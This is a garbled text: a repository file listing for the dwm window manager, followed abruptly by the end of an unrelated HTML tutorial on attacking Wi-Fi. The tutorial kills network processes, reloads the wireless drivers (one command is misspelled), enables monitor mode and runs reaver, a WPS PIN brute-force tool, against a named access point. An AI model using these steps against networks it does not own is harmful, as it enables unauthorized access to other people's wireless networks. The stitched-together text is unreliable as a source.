about summary refs log tree commit diff stats
ModeNameSize
-rw-r--r--.hgtags947log stats plain blame
-rw-r--r--LICENSE1192log stats plain blame
-rw-r--r--Makefile1542log stats plain blame
-rw-r--r--README1088log stats plain blame
-rw-r--r--client.c9079log stats plain blame
-rw-r--r--config.arg.h2620log stats plain blame
-rw-r--r--config.default.h2604log stats plain blame
-rw-r--r--config.mk472log stats plain blame
-rw-r--r--draw.c4655log stats plain blame
-rw-r--r--dwm.13247log stats plain blame
-rw-r--r--dwm.h7504log stats plain blame
-rw-r--r--dwm.png373log stats plain blame
-rw-r--r--event.c8325log stats plain blame
-rw-r--r--main.c7719log stats plain blame
-rw-r--r--tag.c2543log stats plain blame
-rw-r--r--util.c1219log stats plain blame
-rw-r--r--view.c5369log stats plain blame
t 1576 wpa_supplicant 1633 dhclient Process with PID 1576 (wpa_supplicant) is running on interface wlan0 Process with PID 1633 (dhclient) is running on interface wlan0 </pre> <p>Pkill or kill all of them, ex 1271;</p> <pre> # kill -15 1271 </pre> <p>If that fails;</p> <pre> # kill -9 1271 </pre> <p>Just to be sure that everything is as it should;</p> <pre> # rmmod iwlmvm # rmmod iwlwifi # modprob iwlwifi </pre> <p>Put interface in monitor mode;</p> <pre> # iwconfig wlp2s0 mode monitor # ifconfig wlp2s0 up </pre> <pre> # airmon-ng start wlp2s0 Interface Chipset Driver wlp2s0 Intel AC iwlwifi - [phy1] (monitor mode enabled on mon0) </pre> <p>Put mon0 on same channel of target cell;</p> <pre> # iwconfig mon0 channel 6 </pre> <p>Start the magic;</p> <pre> # reaver -i mon0 -b A8:A6:68:98:0C:C5 -vv </pre> </body> </html>